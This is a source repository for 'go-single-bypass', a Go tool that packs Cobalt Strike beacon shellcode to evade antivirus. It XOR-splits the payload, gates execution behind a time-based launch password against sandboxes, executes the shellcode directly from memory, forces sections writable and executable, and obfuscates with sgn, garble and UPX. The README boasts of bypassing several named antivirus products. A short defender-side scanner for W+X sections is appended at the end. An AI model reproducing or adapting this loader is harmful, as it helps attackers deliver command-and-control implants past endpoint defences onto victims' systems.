├── utils
│   ├── sgn.exe
│   ├── upx.exe
│   └── keystone.dll
├── go.mod
├── README.assets
│   ├── image-20220421152204905.png
│   ├── image-20220421153149751.png
│   ├── image-20220421153247347.png
│   ├── image-20220421154009202.png
│   ├── image-20220421154326483.png
│   └── image-20220421154802358.png
├── go.sum
├── make.go
├── stub
│   └── stub.go
├── fixer
│   └── fixer.go
├── LICENSE
├── packer
│   └── packer.go
└── README.md

/utils/sgn.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/utils/sgn.exe
--------------------------------------------------------------------------------

/utils/upx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/utils/upx.exe
--------------------------------------------------------------------------------

/utils/keystone.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/utils/keystone.dll
--------------------------------------------------------------------------------

/go.mod:
--------------------------------------------------------------------------------
module github.com/vyrus001/go-mimikatz

go 1.17

require github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf
--------------------------------------------------------------------------------

/README.assets/image-20220421152204905.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421152204905.png
--------------------------------------------------------------------------------

/README.assets/image-20220421153149751.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421153149751.png
--------------------------------------------------------------------------------

/README.assets/image-20220421153247347.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421153247347.png
--------------------------------------------------------------------------------

/README.assets/image-20220421154009202.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421154009202.png
--------------------------------------------------------------------------------

/README.assets/image-20220421154326483.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421154326483.png
--------------------------------------------------------------------------------

/README.assets/image-20220421154802358.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/piiperxyz/go-single-bypass/HEAD/README.assets/image-20220421154802358.png
--------------------------------------------------------------------------------

/go.sum:
--------------------------------------------------------------------------------
github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf h1:Cx4YJvjPZD91xiffqJOq8l3j1YKcvx3+8duqq7DX9gY=
github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ=
--------------------------------------------------------------------------------

/make.go:
--------------------------------------------------------------------------------
package main

// Build pipeline, run with `go generate` from the project root.
//go:generate cmd.exe /c echo author:piiperxyz
//go:generate go install mvdan.cc/garble@latest
//go:generate utils/sgn.exe -a 64 -o packer/beacon.bin packer/beacon.bin
//go:generate go run packer/packer.go -o stub
//go:generate garble build -o stub/stub stub/stub.go
//go:generate go run fixer/fixer.go -s stub/stub -o cold.exe
//go:generate utils/upx.exe cold.exe -9
--------------------------------------------------------------------------------

/stub/stub.go:
--------------------------------------------------------------------------------
package main

import (
	_ "embed"
	"fmt"
	"os"
	"strconv"
	"syscall"
	"time"
	"unsafe"
)

var (
	//go:embed "pad1"
	pad1 []byte
	//go:embed "pad2"
	pad2 []byte
)

func main() {
	runflag := false
	t := time.Now()
	hour := t.Hour()
	minute := t.Minute()
	day := t.Day()
	// Expected launch argument: hour, minute and day of month, concatenated without zero padding.
	pass := strconv.Itoa(hour) + strconv.Itoa(minute) + strconv.Itoa(day)
	if len(os.Args) < 2 {
		fmt.Printf("No such file or directory")
		os.Exit(0)
	}
	if os.Args[1] == pass {
		runflag = true
	}
	if runflag {
		// Recover the payload by XORing the two embedded pads back together.
		for index, padByte := range pad1 {
			pad2[index] = pad2[index] ^ padByte
		}
		syscall.Syscall(uintptr(unsafe.Pointer(&pad2[0])), 0, 0, 0, 0)
	} else {
		fmt.Printf("No such file or directory")
	}
}
--------------------------------------------------------------------------------

/fixer/fixer.go:
--------------------------------------------------------------------------------
package main

import (
	"flag"
	"os"

	"github.com/Binject/debug/pe"
)

const IMAGE_SCN_MEM_WRITE = 0x80000000

var stubPath, outputPath string

func checkErr(err error) {
	if err != nil {
		panic(err)
	}
}

func init() {
	flag.StringVar(&outputPath, "o", "", "where to put the finished file")
	flag.StringVar(&stubPath, "s", "", "where to find the stub file")
	flag.Parse()
	if (len(outputPath) < 1) || (len(stubPath) < 1) {
		flag.Usage()
		os.Exit(0)
	}
}

func main() {
	stub, err := pe.Open(stubPath)
	checkErr(err)
	// Mark every section of the stub writable and executable.
	for index := range stub.Sections {
		newPerms := stub.Section(stub.Sections[index].Name).Characteristics | IMAGE_SCN_MEM_WRITE | pe.IMAGE_SCN_MEM_EXECUTE
		stub.Section(stub.Sections[index].Name).Characteristics = newPerms
	}
	stub.WriteFile(outputPath)
	stub.Close()
	// Remove the intermediate build artifacts.
	os.Remove("stub\\pad1")
	os.Remove("stub\\pad2")
	os.Remove("stub\\stub")
}
--------------------------------------------------------------------------------

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2022 piiperxyz

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------

/packer/packer.go:
--------------------------------------------------------------------------------
package main

import (
	"bytes"
	_ "embed"
	"flag"
	"fmt"
	"io/ioutil"
	"math/rand"
	"os"
	"path"
	"runtime"
	"time"
)

var exePrefix, outputSuffix, outputPath, stub string

//go:embed beacon.bin
var shellcodeByte []byte

func init() {
	switch runtime.GOARCH {
	case "amd64":
		exePrefix = "x64"
		outputSuffix = "_amd64"
	case "386", "amd64p32":
		exePrefix = "Win32"
		outputSuffix = "_386"
	default:
		fmt.Println("This arch is not compatible with mimikatz")
		os.Exit(0)
	}

	flag.StringVar(&outputPath, "o", "", "where to put the pads")
	flag.Parse()
	if len(outputPath) < 1 {
		flag.Usage()
		os.Exit(0)
	}
}

func checkFatalErr(err error) {
	if err != nil {
		panic(err)
	}
}

func main() {
	// Split the embedded payload into a random pad (pad1) and the payload XORed with it (pad2).
	shellcode := bytes.NewBuffer(shellcodeByte)
	pad1 := make([]byte, len(shellcode.Bytes()))
	pad2 := make([]byte, len(shellcode.Bytes()))
	rand.Seed(time.Now().UnixNano())
	for index, shellcodeByte := range shellcode.Bytes() {
		pad1[index] = byte(rand.Int())
		pad2[index] = pad1[index] ^ shellcodeByte
	}

	checkFatalErr(ioutil.WriteFile(path.Join(outputPath, "pad1"), pad1, 0777))
	checkFatalErr(ioutil.WriteFile(path.Join(outputPath, "pad2"), pad2, 0777))
}
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# go-single-bypass

A simple AV evasion tool, mainly based on go-mimikatz, adapting its technique to Cobalt Strike (CS) shellcode. upx, sgn and garble are also added for obfuscation and compression.

## Disclaimer

This tool is intended for security research only. Using it to launch illegal attacks or for any other unlawful activity is prohibited; the user bears responsibility for the consequences.

## Usage

Put the beacon.bin generated by CS (stageless) into the packer folder and enter the following in the project root:

```shell
go generate
```

The cold.exe generated in the project root is the evasive payload. It must be started with a launch argument consisting of the hour, minute and day of the month: if the payload is run at 12:21 on April 15, the launch password is 122115.

Notes:

* A Go environment must be installed; generation has so far been tested to work on 64-bit Windows.
* The intermediate files produced during generation may not be evasive, so anti-virus software needs to be turned off while generating!
* upx.exe and sgn.exe were downloaded from GitHub; if you do not trust them, replace them with your own copies.
* If dependency downloads are slow, configure a mirror with `go env -w GOPROXY=https://goproxy.cn,direct`; if this is your first Go installation, it is recommended to run that command first.

## Changelog

2022/04/21 Added the launch argument to counter sandboxes; added test screenshots

2022/04/20 Released

## References

https://github.com/vyrus001/go-mimikatz

https://github.com/burrowers/garble

https://github.com/upx/upx

https://github.com/EgeBalci/sgn

## Test results:

Test date: 2022/04/21

![image-20220421152204905](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421152204905.png)

Results against 360 vary; all that can be said is not to keep using the same payload for long.

![image-20220421153149751](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421153149751.png)

![image-20220421153247347](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421153247347.png)

Huorong

![image-20220421154009202](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421154009202.png)

Windows Defender

![image-20220421154326483](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421154326483.png)

Kaspersky Free

![image-20220421154802358](https://github.com/piiperxyz/go-single-bypass/blob/dev/README.assets/image-20220421154802358.png)

--------------------------------------------------------------------------------
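The fixer step of this repository marks every section of the stub writable and executable (IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE), which is a header artifact a defender can look for: linkers normally emit .text as read+execute and .data as read+write, so a PE whose sections are all W+X is unusual. The scanner below is an added, defender-side example and is not part of this repository or of go-mimikatz. It uses Go's standard-library debug/pe package (not the Binject fork the repo depends on); the section-flag constants are from the PE/COFF specification, and the sample image it builds in memory is constructed test data, not a real binary, with one section layout for an ordinary build and one with every section forced to W+X the way fixer.go does.

```go
package main

import (
	"bytes"
	"debug/pe"
	"encoding/binary"
	"fmt"
	"os"
)

// Section characteristic bits from the PE/COFF specification.
const (
	imageScnCntCode            = 0x00000020
	imageScnCntInitializedData = 0x00000040
	imageScnMemExecute         = 0x20000000
	imageScnMemRead            = 0x40000000
	imageScnMemWrite           = 0x80000000
	imageFileExecutableImage   = 0x0002
	imageFileLargeAddressAware = 0x0020
)

// IsWX reports whether a section's characteristics grant both write and execute.
func IsWX(characteristics uint32) bool {
	return characteristics&imageScnMemWrite != 0 && characteristics&imageScnMemExecute != 0
}

// WXSections parses a PE image and returns the names of all W+X sections, in table order.
func WXSections(image []byte) ([]string, error) {
	f, err := pe.NewFile(bytes.NewReader(image))
	if err != nil {
		return nil, err
	}
	defer f.Close()
	var hits []string
	for _, s := range f.Sections {
		if IsWX(s.Characteristics) {
			hits = append(hits, s.Name)
		}
	}
	return hits, nil
}

// BuildSamplePE returns a minimal PE32+ image (constructed test data, not a real
// binary) with three sections carrying ordinary linker permissions. With rwxAll
// set, every section additionally gets MEM_WRITE|MEM_EXECUTE, mirroring fixer.go.
func BuildSamplePE(rwxAll bool) []byte {
	type sect struct {
		name  string
		flags uint32
	}
	sections := []sect{
		{".text", imageScnCntCode | imageScnMemExecute | imageScnMemRead},
		{".rdata", imageScnCntInitializedData | imageScnMemRead},
		{".data", imageScnCntInitializedData | imageScnMemRead | imageScnMemWrite},
	}
	const peOffset, rawSize = 0x40, 0x200 // e_lfanew and per-section raw size/alignment

	var buf bytes.Buffer
	// DOS header: "MZ", zero padding, e_lfanew at offset 0x3c; then the PE signature.
	dos := make([]byte, peOffset)
	dos[0], dos[1] = 'M', 'Z'
	binary.LittleEndian.PutUint32(dos[0x3c:], peOffset)
	buf.Write(dos)
	buf.WriteString("PE\x00\x00")

	// COFF file header. SizeOfOptionalHeader stays 0; debug/pe accepts an image
	// without an optional header, which keeps the constructed sample small.
	fh := pe.FileHeader{
		Machine:          pe.IMAGE_FILE_MACHINE_AMD64,
		NumberOfSections: uint16(len(sections)),
		Characteristics:  imageFileExecutableImage | imageFileLargeAddressAware,
	}
	binary.Write(&buf, binary.LittleEndian, &fh)

	// Section table: one 40-byte header per section, raw data placed after the headers.
	for i, s := range sections {
		flags := s.flags
		if rwxAll {
			flags |= imageScnMemWrite | imageScnMemExecute
		}
		var sh pe.SectionHeader32
		copy(sh.Name[:], s.name)
		sh.VirtualSize = rawSize
		sh.VirtualAddress = uint32(0x1000 * (i + 1))
		sh.SizeOfRawData = rawSize
		sh.PointerToRawData = uint32(rawSize * (i + 1))
		sh.Characteristics = flags
		binary.Write(&buf, binary.LittleEndian, &sh)
	}

	// Pad the headers out to the first section and append zeroed section data.
	out := make([]byte, rawSize*(len(sections)+1))
	copy(out, buf.Bytes())
	return out
}

func main() {
	hits, err := WXSections(BuildSamplePE(true))
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Printf("writable+executable sections: %v\n", hits)
}
```

Pointing WXSections at a real file (read with os.ReadFile) works the same way; the check is cheap enough to run over every PE in a quarantine folder, and an executable whose .rdata or .data is executable, or whose .text is writable, deserves a closer look regardless of which packer produced it.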